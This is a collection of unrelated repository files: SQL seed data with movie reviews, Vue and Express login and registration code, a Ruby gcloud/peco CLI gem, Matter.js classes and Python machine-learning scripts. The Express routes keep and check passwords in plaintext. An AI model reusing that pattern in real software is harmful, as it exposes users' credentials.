NULL,"https://img3.doubanio.com/icon/up37507203-106.jpg",1075938752,"有心打扰",123456
);
INSERT INTO bean_user VALUES(
NULL,"https://img3.doubanio.com/icon/up37507203-106.jpg",1075938753,"大聪看电影",123456
);
INSERT INTO bean_user VALUES(
NULL,"https://img3.doubanio.com/icon/up37507203-106.jpg",1075938754,"海月夜",123456
);
INSERT INTO bean_user VALUES(
NULL,"https://img3.doubanio.com/icon/up1402913-10.jpg",1075938755,"SELVEN",123456
);
INSERT INTO bean_user VALUES(
NULL,"https://img1.doubanio.com/icon/up50048249-47.jpg",1075938756,"Vi",123456
);
INSERT INTO bean_user VALUES(
NULL,"https://img3.doubanio.com/icon/up1666383-355.jpg",1075938757,"发条橙",123456
);
# Comments table
CREATE TABLE bean_comment(
uid INT PRIMARY KEY AUTO_INCREMENT,
id INT,
headportrait VARCHAR(128),
uname VARCHAR(64),
comments VARCHAR(256),
commenttime DATETIME,
commentscore INT
);
INSERT INTO bean_comment VALUES(
NULL,1,"https://img3.doubanio.com/icon/up52057602-1.jpg","星夜流云","50/100 这部电影浪费了麦肯吉的纯真,特效设计想象力贫乏、美术指导有型无神,可能唯一优点是催眠效果一流,害得打算在过道狂奔的同场小朋友们集体安静如鸡。女主走入白雪世界的一瞬间让人想起了《纳尼亚传奇》,如果制作者们看过那部还觉得自己的拿得出手,那脸皮也真够厚的。","2018-11-3 10:12:30",6
);
INSERT INTO bean_comment VALUES(
NULL,1,"https://img3.doubanio.com/icon/up147712190-14.jpg","星夜流云","空洞平淡,开头飞越伦敦的那个镜头惊艳,已经想好可以用在迪士尼乐园的游乐项目里了","2018-11-3 01:12:30",4
);
INSERT INTO bean_comment VALUES(
NULL,1,"https://img3.doubanio.com/icon/up52057602-1.jpg","星夜流云","除了场面大,女主美之外,没啥好说的。美国佬为了政治正确,动不动就在传统的欧洲童话里硬塞黑人角色,也是醉了。3颗星送给场景、服装和女主。","2018-11-3 10:12:30",6
);
INSERT INTO bean_comment VALUES(
NULL,1,"https://img3.doubanio.com/icon/up37507203-106.jpg","发条橙","华美精致的服装并无法赋予人物以深度,艳丽唯美的基色也并不能构建剧情的惊艳,根据经典改变的《胡桃夹子和四个王国》虽有着一副好看的皮囊,但这一次的迪士尼却没能在故事上给人带来多少新意,剧情的羸弱老套使电影最终显得既空洞又无趣。","2018-11-1 06:12:30",6
);
INSERT INTO bean_comment VALUES(
NULL,1,"https://img3.doubanio.com/icon/up37507203-106.jpg","梦里诗书","片尾的芭蕾舞很好看,男舞者的非常大哈哈哈哈","2018-11-1 06:12:30",4
);
INSERT INTO bean_comment VALUES(
NULL,1,"https://img3.doubanio.com/icon/up1402913-10.jpg","星夜流云","很古典的迪士尼电影,《欢乐满人间》的一次变奏。真正需要被拯救的其实是失去妻子的父亲,克拉拉找到的钥匙打开的也是父亲的心锁。","2018-11-5 10:12:30",8
);
INSERT INTO bean_comment VALUES(
NULL,1,"https://img1.doubanio.com/icon/up50048249-47.jpg","星夜流云","2.5 美术上华丽如旧。其实只是毫无野心的乖乖产品,被差评成如此地步也是我见犹怜。","2018-11-3 03:12:30",4
);
INSERT INTO bean_comment VALUES(
NULL,1,"https://img3.doubanio.com/icon/up1666383-355.jpg","星夜流云","两星半。特意找了一场国配,从小看译制片留下的情结,国配的胡桃夹子对我来说是个加分项,加了起码一颗星。其实也不是一无是处,踩在大齿轮上看现实中放慢的世界,这点子不错啊,可惜走马观花了。接着是整整一小时走马观花的生理隐喻:撸着脐带进入最初的生命国度,两个男国王要么是冻体(性冷淡)要么是同性恋,进入巨型女玩偶裙子底下看到了六个震动幅度不等的跳蛋,老鼠大军SM贯穿全片(它们的女主人爱抽鞭子),以及回到现实后赤果果的恋父……被迪士尼关键时刻借着摩根·弗里曼性丑闻事件当成了鸡肋项目也算很鸡贼了。","2018-11-4 10:12:30",6
);
<file_sep>(function(){
new Vue({
el:"#form",
data:{
uname:"",
upwd:"",
},
methods:{
            submit(){
                axios.post(
                    "http://localhost:4000/user/login",
                    Qs.stringify({
                        uname:this.uname,
                        upwd:this.upwd
                    }),
                    {headers: {'Content-Type': 'application/x-www-form-urlencoded'}}
                ).then(res=>{
                    // routes/user.js replies with {code:200} on success, {code:301} otherwise
                    console.log(res.data);
                })
            }},
mounted(){
}
})
})()<file_sep>(function(){
new Vue({
el:"#form",
data:{
uname:"",
upwd:"",
cpwd:"",
email:"",
phone:"",
isuname:false,
isupwd:false,
iscpwd:false,
ispwd:false,
isemail:false,
isphone:false
        },methods:{
            submit(){
                // Basic required-field validation before submitting
                if(this.uname===""){
                    this.isuname=true;
                    return;
                }else{
                    this.isuname=false;
                }
                if(this.upwd===""){
                    this.isupwd=true;
                    return;
                }else{
                    this.isupwd=false;
                }
                if(this.cpwd===""){
                    this.iscpwd=true;
                    return;
                }else{
                    this.iscpwd=false;
                }
                if(this.upwd!=this.cpwd){
                    this.ispwd = true;
                    return;
                }else{
                    this.ispwd=false;
                }
                if(this.email===""){
                    this.isemail=true;
                    return;
                }else {
                    this.isemail=false;
                }
                if(this.phone===""){
                    this.isphone=true;
                    return;
                } else{
                    this.isphone=false;
                }
                axios.post(
                    "http://localhost:4000/user/register/",
                    Qs.stringify({
                        uname:this.uname,
                        upwd:this.upwd,
                        email:this.email,
                        phone:this.phone,
                    }),
                    {headers: {'Content-Type': 'application/x-www-form-urlencoded'}}
                )
            }
        },
mounted(){
}
})
})()<file_sep>const express = require('express');
const pool = require('../pool.js');//import the database connection module
//set up a router
var router = express.Router();
//1. user registration
router.post('/register',(req,res)=>{
var obj=req.body;
console.log(obj);
//validate the data sent by the client
var $uname = obj.uname;
if(!$uname){ // $uname == ''
res.send({code: 401, msg: 'uname required'});
//stop further execution
return;
}
//validate the password, email, and phone fields
var $upwd = obj.upwd;
if(!$upwd){
res.send({code: 402, msg: 'upwd required'});
return;
}
var $email = obj.email
if(!$email) {
res.send({code: 403, msg: 'email required'});
return;
}
var $phone = obj.phone;
if(!$phone){
res.send({code: 404, msg: 'phone required'});
return;
}
//insert the data into the database
var sql = 'INSERT INTO xc_user VALUES(NULL,?,?,?,?,NULL,NULL,NULL)';
pool.query(sql,[$uname,$upwd,$email,$phone],(err,result)=>{
if(err) throw err;
//report the registration result
res.writeHead(200,{"Content-Type":"application/json;charset=utf-8",
"Access-Control-Allow-Origin":"*"})
console.log(result);
//an INSERT returns an OkPacket, so check affectedRows rather than length
if(result.affectedRows>0){
res.write(JSON.stringify({ok:1}))
}else{
res.write(JSON.stringify({ok:0,msg:"registration failed"}))
}
res.end();
});
});
//2. user login
router.post('/login',(req,res)=>{
var obj = req.body;
//check that the username and password are not empty
var $uname = obj.uname;
if(!$uname){
res.send({code: 401, msg: 'uname required'});
return;
}
var $upwd = obj.upwd;
if(!$upwd){
res.send({code: 402, msg: 'upwd required'});
return;
}
//check whether the database contains a matching record
//(one that satisfies both uname = $uname and upwd = $upwd)
var sql='SELECT * FROM xc_user WHERE uname=? AND upwd=?';
pool.query(sql,[$uname,$upwd],(err,result)=>{
if(err) throw err;
//result is an array:
//if its length is greater than 0, a matching record was found;
//otherwise (length 0) there is no matching record
if(result.length>0){
res.send({code: 200, msg: 'login suc'});
}else{
res.send({code: 301, msg: 'uname or upwd error'});
}
});
});
//export the router
module.exports = router;<file_sep>const express=require("express");
const router=express.Router();
const pool=require("../pool");
router.post("/login",(req,res)=>{
    var uname = req.body.uname;
    var upwd = req.body.upwd;
    // completed from the parallel implementation in routes/user.js
    var sql = "SELECT * FROM xc_user WHERE uname=? AND upwd=?";
    pool.query(sql,[uname,upwd],(err,result)=>{
        if(err) throw err;
        res.send(result.length>0 ? {code:200, msg:'login suc'} : {code:301, msg:'uname or upwd error'});
    });
})
module.exports=router;<file_sep># xiecheng
Ctrip (携程)
|
492a465fd308153ac62d31e19f6dac5b8b35c9c2
|
[
"JavaScript",
"SQL",
"Markdown"
] | 9 |
JavaScript
|
zhou10759/xiecheng
|
cffcd4f98d4b8a83f19311206e1b0ecd957a2d24
|
9083db861809cf892013f0dd93bf083b4805ee06
|
refs/heads/master
|
<repo_name>kamito/geco<file_sep>/geco.gemspec
# coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'geco/version'
Gem::Specification.new do |spec|
spec.name = "geco"
spec.version = Geco::VERSION
spec.authors = ["<NAME>"]
spec.email = ["<EMAIL>"]
spec.summary = %q{geco = gcloud + peco: select GCP resources using peco, and run gcloud}
spec.description = %q{geco = gcloud + peco: select GCP resources using peco, and run gcloud}
spec.homepage = "https://github.com/minimum2scp/geco"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0")
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_runtime_dependency "thor", "~> 0.19.1"
spec.add_runtime_dependency "text-table", "~> 1.2.4"
spec.add_development_dependency "bundler", "~> 1.7"
spec.add_development_dependency "rake", "~> 10.0"
end
<file_sep>/bin/geco
#! /usr/bin/env ruby
require 'geco'
Geco::Cli.start
<file_sep>/lib/geco.rb
require "geco/version"
require 'json'
require 'open3'
require 'yaml/store'
require 'etc'
require 'singleton'
require 'thor'
require 'text-table'
module Geco
class Cli < Thor
class_option :zsh_widget, :type => :boolean, :default => false, :aliases => ['-z']
option :project, :type => :string, :aliases => ['-p']
desc "ssh", "select vm instance by peco, and run gcloud compute ssh"
long_desc <<-LONG_DESC
execute `gcloud compute instances list`,
and filter the results by `peco`,
and execute or print `gcloud compute ssh`
LONG_DESC
def ssh
vm_instance = transaction{
project = options[:project] || Config.instance.get('core/project')
VmInstanceList.load(project: project).select(multi:false, project:project)
}
if options[:zsh_widget]
puts vm_instance.build_ssh_cmd
else
system vm_instance.build_ssh_cmd
end
rescue => e
if !options[:zsh_widget]
raise e
end
end
desc "project", "select project and run gcloud config set project"
long_desc <<-LONG_DESC
execute `gcloud preview projects list`,
and filter the results by `peco`,
and execute or print `gcloud config set project`
see https://cloud.google.com/sdk/gcloud/reference/preview/
about `gcloud preview ...`
LONG_DESC
def project
project = transaction{ ProjectList.load.select(multi:false) }
if options[:zsh_widget]
puts project.build_config_set_project_cmd
else
system project.build_config_set_project_cmd
end
rescue => e
if !options[:zsh_widget]
raise e
end
end
desc "gencache", "cache all projects and instances"
def gencache
transaction do
puts "loading projects..."
project_list = ProjectList.load(force: true)
puts "found #{project_list.projects.size} projects."
project_list.projects.each do |project|
puts "loading VM instances on project: #{project.title} (#{project.id})"
vm_instance_list = VmInstanceList.load(force:true, project: project.id)
puts "found #{vm_instance_list.instances.size} vm instances"
end
end
end
no_commands do
def transaction
Cache.instance.transaction do
yield
end
end
end
end
## gcloud preview projects list
class Project < Struct.new(:id, :title, :number)
def build_config_set_project_cmd
%Q[gcloud config set project "#{id}"]
end
end
## gcloud preview projects list
class ProjectList < Struct.new(:projects)
def select(multi:false)
selected = Open3.popen3('peco'){|stdin, stdout, stderr, wait_thr|
stdin.puts to_table
stdin.close_write
stdout.readlines
}.map{ |line|
projects.find{|prj| prj.id == line.chomp.gsub(/(^\|\s*|\s*\|$)/, '').split(/\s*\|\s*/).first }
}.reject{|prj|
prj.id == "id" || prj.id =~ /^[+-]+$/
}
if multi
selected
elsif selected.size == 1
selected.first
else
raise "please select 1 Project"
end
end
def to_table
fields = Project.new.members
table = Text::Table.new( :head => fields, :rows => projects.map{|i| fields.map{|f| i.send(f)}} )
end
class << self
def preview_installed?
! (%x[gcloud components list 2>/dev/null | grep -F '| preview '] =~ /Not Installed/)
end
def load(force:false)
if !preview_installed?
abort 'gcloud component "preview" is not installed, please install by `gcloud components update preview`'
end
if force || ! defined?(@@projects)
@@projects = Cache.instance.get_or_set('projects', expire:24*60*60) do
JSON.parse(%x[gcloud preview projects list --format json]).map{|prj|
Project.new(prj['projectId'], prj['title'], prj['projectNumber'])
}
end
end
ProjectList.new(@@projects)
end
end
end
## gcloud compute ssh ...
## gcloud compute instances ...
class VmInstance < Struct.new(:project, :name, :zone, :machine_type, :internal_ip, :external_ip, :status)
def build_ssh_cmd
%Q[gcloud compute --project="#{project}" ssh --zone="#{zone}" "#{name}"]
end
end
## gcloud compute instances ...
class VmInstanceList < Struct.new(:instances)
def select(multi:false, project:false)
selected_instances = Open3.popen3('peco'){|stdin, stdout, stderr, wait_thr|
stdin.puts to_table(with_project: !!project)
stdin.close_write
stdout.readlines
}.map{ |line|
selected = line.chomp.gsub(/(^\|\s*|\s*\|$)/, '').split(/\s*\|\s*/)
instances.find{|i| project ? (i.name == selected[0]) : (i.name == selected[1] && i.project == selected[0]) }
}.reject{|i|
i.name == "name" || i.name =~ /^[+-]+$/
}
if multi
selected_instances
elsif selected_instances.size == 1
selected_instances.first
else
raise "please select 1 VM instance"
end
end
def to_table(with_project:false)
fields = VmInstance.new.members
fields.reject!{|i| i == :project} if with_project
table = Text::Table.new( :head => fields, :rows => instances.map{|i| fields.map{|f| i.send(f)}} )
end
class << self
def load(force:false, project:nil)
if project
if force || ! defined?(@@instances)
@@instances = Cache.instance.get_or_set("instances/#{project}") do
JSON.parse(%x[gcloud compute instances list --project=#{project} --sort-by name --format json]).map{|i|
VmInstance.new(project, i['name'], i['zone'], i['machineType'], i['networkInterfaces'].first['networkIP'], i['networkInterfaces'].first['accessConfigs'].first['natIP'], i['status'])
}
end
end
VmInstanceList.new(@@instances)
else
project_list = ProjectList.load
## TODO: refactoring
@@instances = project_list.projects.map{|project|
Cache.instance.get_or_set("instances/#{project.id}") do
VmInstanceList.load(force:force, project:project.id)
Cache.instance.get("instances/#{project.id}")
end
}.flatten
VmInstanceList.new(@@instances)
end
end
end
end
## gcloud config ...
class Config
include Singleton
def initialize
@config = JSON.parse %x[gcloud config list --all --format json]
end
def get(arg)
sec, key = arg.split('/', 2)
@config[sec][key]
end
end
class Cache
include Singleton
def initialize(path:"/tmp/gcloud-cache.#{Etc.getlogin}.yaml")
@db = YAML::Store.new(path)
end
def transaction
@in_transaction = true
ret = nil
@db.transaction do
ret = yield
end
ensure
@in_transaction = false
ret
end
def get_or_set(key, expire:24*60*60, &block)
get(key) || set(key, block.call, expire:expire)
end
def set(key, value, expire:24*60*60)
if @in_transaction
@db[key] = {value: value, expire: Time.now+expire}; value
else
self.transaction{ self.set(key, value, expire:expire) }
end
end
def get(key)
if @in_transaction
@db[key] && @db[key][:expire] > Time.now ? @db[key][:value] : nil
else
self.transaction{ self.get(key) }
end
end
end
end
<file_sep>/README.md
# Geco
[](LICENSE.txt)
[](http://badge.fury.io/rb/geco)
[](https://codeclimate.com/github/minimum2scp/geco)
geco = gcloud + peco: select GCP resource using peco, and run gcloud
## Installation
Add this line to your application's Gemfile:
```ruby
gem 'geco'
```
And then execute:

    $ bundle

Or install it yourself as:

    $ gem install geco
## Usage
TODO: Write usage instructions here
## Contributing
1. Fork it ( https://github.com/minimum2scp/geco/fork )
2. Create your feature branch (`git checkout -b my-new-feature`)
3. Commit your changes (`git commit -am 'Add some feature'`)
4. Push to the branch (`git push origin my-new-feature`)
5. Create a new Pull Request
|
ea5004dffddd2ffdc68f847afddf631bb13f24fa
|
[
"Markdown",
"Ruby"
] | 4 |
Ruby
|
kamito/geco
|
7127c4bb8b789cdbe0bfce4c369e1e3bbeddcbc0
|
07430c81fbe3c56ac9c8d3bcf7cca69129853675
|
refs/heads/master
|
<file_sep>class Paperball{
constructor(x,y,radius){
//var options={
//}
this.body=Bodies.circle(x,y,radius);
this.radius=radius;
this.image=loadImage("paper.png");
World.add(world,this.body);
}
display(){
var pos=this.body.position;
// console.log(this.body); // logging every frame floods the console
imageMode(CENTER);
image(this.image, pos.x, pos.y, this.radius * 2, this.radius * 2); // width/height = diameter, not radius
}
}<file_sep>class Catapult{
constructor(bodyA,pointB){
var options={
bodyA:bodyA,
pointB:pointB,
stiffness:0.04,
length:1
}
this.catapult= Constraint.create(options);
this.pointB=pointB;
}
fly(){
this.catapult.bodyA=null;
}
display(){
if(this.catapult.bodyA){
var pointA= this.catapult.bodyA.position;
var pointB= this.pointB;
line(pointA.x,pointA.y,pointB.x,pointB.y);
}
}
}
|
6202a6f6015bce1983ef6ecf26455f8711e46cbe
|
[
"JavaScript"
] | 2 |
JavaScript
|
GurmehrBindra/Project28
|
6f5d60dffbe0f2e0aaa3aa131d5cea69f8e5d6ca
|
8605c69aba079eae9cc697fce9c7aa2c22e6a648
|
refs/heads/master
|
<file_sep>function funkcija4() {
var x=document.getElementById("MojDiv");
if (x.style.visibility === "unset") {
x.style.visibility = "hidden";
}
else {
x.style.display = "hidden";
}
}
function funckija5() {
var y=document.getElementById("MojDiv");
if (y.style.visibility === "hidden"){
y.style.visibility = "unset";
}
else{
y.style.visibility = "unset";
}
}
|
ef635318afa8d84c4de20d9a420468b3b9e54889
|
[
"JavaScript"
] | 1 |
JavaScript
|
fransokolic1/Java_Script-DOM
|
58265b4ed2bea26e5cd164b1abb0f2bb88f59502
|
d84b5f285ed08d07dee3d56ee340674645c35f79
|
refs/heads/master
|
<repo_name>paulodiff/machine-learning<file_sep>/Activation-Functions.py
# Display of Activation Functions and softmax
import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
# helper for variable defs
def init_weights(shape, name):
return tf.Variable(tf.random_normal(shape, stddev=0.01), name=name)
# Function to minimize
# y = 0.1 * x + 0.3
num_points = 10
# STEP 1 - input data build
vectors_set = []
for i in range(num_points):
x1 = np.random.normal(0.0, 0.55)
y1 = x1 * 0.1 + 0.3 + np.random.normal(0.0, 0.03)
vectors_set.append([x1, y1])
x_data = [v[0] for v in vectors_set]
y_data = [v[1] for v in vectors_set]
print('x_data:------------------------------------------------')
print(x_data)
print('y_data:------------------------------------------------')
print(y_data)
# STEP 2 - create input and placeholders
x_1 = tf.placeholder(tf.float32, None)
W = tf.Variable(tf.random_uniform([1], -1.0, 1.0))
b = tf.Variable(tf.zeros([1]))
#STEP 3 - model
y = W * x_data + b
xAll = tf.maximum(x_data, x_data)
xL = tf.lin_space(-6.0,6.0,1000)
ySigmoid = tf.nn.sigmoid(xL)
yRELU = tf.nn.relu(xL)
yELU = tf.nn.elu(xL)
yTANH = tf.nn.tanh(xL)
#STEP 4 - cost function
# mean squared error helps us to move forward step by step.
# cost = tf.reduce_mean(tf.square(y - y_data))
# train_op = tf.train.RMSPropOptimizer(0.001, 0.9).minimize(cost)
# train_op = tf.train.GradientDescentOptimizer(0.1).minimize(cost)
# tf.scalar_summary("cost", cost)
# Initializing the variables
init = tf.global_variables_initializer()
#Step 9 Create a session - START
with tf.Session() as sess:
sess.run(init)
print(xL)
fig1 = plt.figure()
# add_subplot(NMI): grid of N rows x M cols, position I
ax1 = fig1.add_subplot(331)
ax2 = fig1.add_subplot(332)
ax3 = fig1.add_subplot(333)
ax4 = fig1.add_subplot(334)
yS,yR,yE,yT, xL1 = sess.run([ySigmoid, yRELU, yELU, yTANH, xL], feed_dict={x_1 : xL.eval()})
# print(step, sess.run(W), sess.run(b), sess.run(cost))
print(yS)
print(xL1)
ax1.plot(xL1, yS, 'r')
ax1.set_title('sigmoid')
ax2.plot(xL1, yR, 'r')
ax2.set_title('relu')
ax3.plot(xL1, yE, 'g')
ax3.set_title('elu')
ax4.set_title('tanh')
ax4.plot(xL1, yT, 'g')
# ax1.plot(x_data, sess.run(W) * x_data + sess.run(b))
# ax1.plot(x_data, w1 * x_data + b1)
# ax2.plot(x_data, yS)
# ax1.set_xlabel('x step: {0} cost: {1}'.format(step,c1))
# plt.pause(5)
plt.legend()
plt.show()
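For reference, the four activations plotted above can be computed directly with NumPy (a minimal sketch independent of TensorFlow; the helper names are my own):

```python
import numpy as np

def sigmoid(x):
    # 1 / (1 + e^-x), squashes input to (0, 1)
    return 1.0 / (1.0 + np.exp(-x))

def relu(x):
    # max(0, x)
    return np.maximum(0.0, x)

def elu(x, alpha=1.0):
    # x for x > 0, alpha * (e^x - 1) otherwise
    return np.where(x > 0, x, alpha * (np.exp(x) - 1.0))

x = np.linspace(-6.0, 6.0, 1000)  # same range as tf.lin_space above
print(sigmoid(0.0))           # 0.5
print(relu(-3.0), relu(3.0))  # 0.0 3.0
print(np.tanh(0.0))           # 0.0
```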
<file_sep>/tf-COMPLEMENTARY-COLOR.py
# idea https://deeplearnjs.org/demos/complementary-color-prediction/complementary_color_prediction.html
# from https://www.tensorflow.org/get_started/estimator
# regression DNNRegression https://github.com/tensorflow/tensorflow/tree/master/tensorflow/examples/learn
# Complementary Color Prediction
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import urllib
import numpy as np
import tensorflow as tf
print("Tensorflow version: " + tf.__version__)
# Data sets
C_COLOR_TRAINING = "tf-c-color-training.csv"
C_COLOR_TEST = "tf-c-color-test.csv"
# for TensorBoard
MODEL_DIR = "c:/ai/nn/tmp/model/complementarycolor"
print("START OPERAZIONI")
# If the training and test sets aren't stored locally, download them.
#if not os.path.exists(IRIS_TRAINING):
# raw = urllib.urlopen(IRIS_TRAINING_URL).read()
# with open(IRIS_TRAINING, "w") as f:
# f.write(raw)
#if not os.path.exists(IRIS_TEST):
# raw = urllib.urlopen(IRIS_TEST_URL).read()
# with open(IRIS_TEST, "w") as f:
# f.write(raw)
print('Loading datasets, specifying the FEATURE types')
# Load datasets.
training_set = tf.contrib.learn.datasets.base.load_csv_with_header(
filename=C_COLOR_TRAINING,
features_dtype=np.int,
target_dtype=np.int)
test_set = tf.contrib.learn.datasets.base.load_csv_with_header(
filename=C_COLOR_TEST,
features_dtype=np.int,
target_dtype=np.int)
print('Printing some TRAINING values')
print(training_set.data)
print('Printing some TEST values')
print(test_set.data)
print('Setting up the columns')
# Specify that all features have real-value data
feature_columns = [tf.feature_column.numeric_column("x", shape=[4])]
print('Initializing the classifier')
# Build 3 layer DNN with 10, 20, 10 units respectively.
classifier = tf.estimator.DNNClassifier(feature_columns=feature_columns,
hidden_units=[10, 20, 10],
n_classes=3,
# optimizer default Adagrad
# activation_fn default relu
# dropout default none
model_dir=MODEL_DIR)
# Define the training inputs
print('Defining the training input function')
train_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": np.array(training_set.data)},
y=np.array(training_set.target),
num_epochs=None,
shuffle=True)
print('Training ....')
# Train model.
classifier.train(input_fn=train_input_fn, steps=2000)
print('Defining the test input function')
# Define the test inputs
test_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": np.array(test_set.data)},
y=np.array(test_set.target),
num_epochs=1,
shuffle=False)
print('Definizione dell"accuratezza del dato usando l"insieme di test')
# Evaluate accuracy.
accuracy_score = classifier.evaluate(input_fn=test_input_fn)["accuracy"]
print("\nTest Accuracy: {0:f}\n".format(accuracy_score))
print('Defining some samples for prediction')
# Classify four new samples.
new_samples = np.array(
[[6.4, 3.2, 4.5, 1.5],
[5.8, 3.1, 5.0, 1.7],
[6.4, 2.8, 5.6, 2.2],
[4.9, 3.1, 1.5, 0.1]
], dtype=np.float32)
predict_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": new_samples},
num_epochs=1,
shuffle=False)
pcl = classifier.predict(input_fn=predict_input_fn)
print('Inference result')
print(pcl)
pc = list(pcl)
print('Inference result via list()')
print(pc)
print('Printing the list...')
for p in pc:
print(p["classes"])
print('Inference result using classes...')
predicted_classes = [p["classes"] for p in pc]
print(predicted_classes)
print("New Samples, Class Predictions: {}\n".format(predicted_classes))
print('OPERATIONS COMPLETE')<file_sep>/word2vect-kaggle.py
# https://www.kaggle.com/c/word2vec-nlp-tutorial/details/part-1-for-beginners-bag-of-words
# Import the pandas package, then use the "read_csv" function to read
# the labeled training data
import pandas as pd
train = pd.read_csv("./labeledTrainData.tsv", header=0, delimiter="\t", quoting=3)
print(train.shape)
# Import BeautifulSoup into your workspace
from bs4 import BeautifulSoup
# Initialize the BeautifulSoup object on a single movie review
example1 = BeautifulSoup(train["review"][0], "html.parser")
# Print the raw review and then the output of get_text(), for
# comparison
print(train["review"][0])
print(example1.get_text())
import re
# Use regular expressions to do a find-and-replace
letters_only = re.sub("[^a-zA-Z]", # The pattern to search for
" ", # The pattern to replace it with
example1.get_text() ) # The text to search
print(letters_only)
import nltk
# nltk.download() # Download text data sets, including stop words
from nltk.corpus import stopwords # Import the stop word list
print(stopwords.words("english"))
def review_to_words( raw_review ):
# Function to convert a raw review to a string of words
# The input is a single string (a raw movie review), and
# the output is a single string (a preprocessed movie review)
#
# 1. Remove HTML
review_text = BeautifulSoup(raw_review, "html.parser").get_text()
#
# 2. Remove non-letters
letters_only = re.sub("[^a-zA-Z]", " ", review_text)
#
# 3. Convert to lower case, split into individual words
words = letters_only.lower().split()
#
# 4. In Python, searching a set is much faster than searching
# a list, so convert the stop words to a set
stops = set(stopwords.words("english"))
#
# 5. Remove stop words
meaningful_words = [w for w in words if not w in stops]
#
# 6. Join the words back into one string separated by space,
# and return the result.
return( " ".join( meaningful_words ))
clean_review = review_to_words( train["review"][0] )
print(clean_review)
# Get the number of reviews based on the dataframe column size
num_reviews = train["review"].size
# Initialize an empty list to hold the clean reviews
clean_train_reviews = []
# Loop over each review; create an index i that goes from 0 to the length
# of the movie review list
#for i in range( 0, num_reviews ):
# # Call our function for each one, and add the result to the list of
# # clean reviews
# clean_train_reviews.append( review_to_words( train["review"][i] ) )
print("Cleaning and parsing the training set movie reviews...\n")
clean_train_reviews = []
for i in range( 0, num_reviews ):
# If the index is evenly divisible by 1000, print a message
if( (i+1)%1000 == 0 ):
print("Review %d of %d\n" % ( i+1, num_reviews ))
clean_train_reviews.append( review_to_words( train["review"][i] ))
print("Creating the bag of words...\n")
from sklearn.feature_extraction.text import CountVectorizer
# Initialize the "CountVectorizer" object, which is scikit-learn's
# bag of words tool.
vectorizer = CountVectorizer(analyzer = "word", \
tokenizer = None, \
preprocessor = None, \
stop_words = None, \
max_features = 5000)
# fit_transform() does two functions: First, it fits the model
# and learns the vocabulary; second, it transforms our training data
# into feature vectors. The input to fit_transform should be a list of
# strings.
train_data_features = vectorizer.fit_transform(clean_train_reviews)
# Numpy arrays are easy to work with, so convert the result to an
# array
train_data_features = train_data_features.toarray()
# Take a look at the words in the vocabulary
vocab = vectorizer.get_feature_names()
print(vocab)
import numpy as np
# Sum up the counts of each vocabulary word
dist = np.sum(train_data_features, axis=0)
# For each, print the vocabulary word and the number of times it
# appears in the training set
for tag, count in zip(vocab, dist):
print(count, tag)
print("Training the random forest...")
from sklearn.ensemble import RandomForestClassifier
# Initialize a Random Forest classifier with 100 trees
forest = RandomForestClassifier(n_estimators = 100)
# Fit the forest to the training set, using the bag of words as
# features and the sentiment labels as the response variable
#
# This may take a few minutes to run
forest = forest.fit( train_data_features, train["sentiment"] )<file_sep>/dqn.py
# -*- coding: utf-8 -*-
# https://keon.io/deep-q-learning/
# CartPole-v0 - https://github.com/openai/gym/wiki/CartPole-v0
# 0 Cart Position -2.4 2.4
# 1 Cart Velocity -Inf Inf
# 2 Pole Angle ~ -41.8° ~ 41.8°
# 3 Pole Velocity At Tip -Inf Inf
# The system is controlled by applying a force of +1 or -1 to the cart.
# The pendulum starts upright, and the goal is to prevent it from falling over.
# A reward of +1 is provided for every timestep that the pole remains upright.
# The episode ends when the pole is more than 15 degrees from vertical, or the cart moves more than 2.4 units from the center.
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import random
import gym
import numpy as np
from collections import deque
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import Adam
EPISODES = 1000
class DQNAgent:
def __init__(self, state_size, action_size):
self.state_size = state_size
self.action_size = action_size
self.memory = deque(maxlen=2000) # FIFO len 2000
self.gamma = 0.95 # discount rate
self.epsilon = 1.0 # exploration rate
self.epsilon_min = 0.01
self.epsilon_decay = 0.995
self.learning_rate = 0.001
self.model = self._build_model()
def _build_model(self):
# Neural Net for Deep-Q learning Model
model = Sequential()
model.add(Dense(24, input_dim=self.state_size, activation='relu'))
model.add(Dense(24, activation='relu'))
model.add(Dense(self.action_size, activation='linear'))
# For a mean squared error regression problem
model.compile(loss='mse', optimizer=Adam(lr=self.learning_rate))
return model
def remember(self, state, action, reward, next_state, done):
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
# The agent chooses an action
if np.random.rand() <= self.epsilon:
retvalue = random.randrange(self.action_size)
# print(retvalue)
# print("DQNAgent:act R {}".format(retvalue))
return retvalue
act_values = self.model.predict(state)
retvalue = np.argmax(act_values[0])
# print("DQNAgent:act P {}".format(retvalue))
return retvalue # returns action
def replay(self, batch_size):
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state, done in minibatch:
target = reward
if not done:
target = (reward + self.gamma *
np.amax(self.model.predict(next_state)[0]))
target_f = self.model.predict(state)
target_f[0][action] = target
# print("MODEL FIT ", state[0][0], state[0][2], target_f, target, done )
# train with state and target_f
self.model.fit(state, target_f, epochs=1, verbose=0)
if self.epsilon > self.epsilon_min:
self.epsilon *= self.epsilon_decay
def load(self, name):
self.model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
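The target computed in `replay()` is the standard one-step Q-learning update, target = reward + gamma * max_a' Q(next_state, a'). The same arithmetic in isolation, with a plain list standing in for the model's predicted Q-values:

```python
def q_target(reward, next_q_values, gamma=0.95, done=False):
    # terminal transitions carry no discounted future value
    if done:
        return reward
    return reward + gamma * max(next_q_values)

print(q_target(1.0, [0.5, 2.0]))               # 1.0 + 0.95 * 2.0 = 2.9
print(q_target(-10.0, [0.5, 2.0], done=True))  # -10.0
```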
if __name__ == "__main__":
# enable plot update
plt.ion()
fig = plt.figure()
ax1 = fig.add_subplot(211)
ax1.set_xlabel('GameN')
ax1.set_ylabel('Score')
ax1.set_title('Q-Learning')
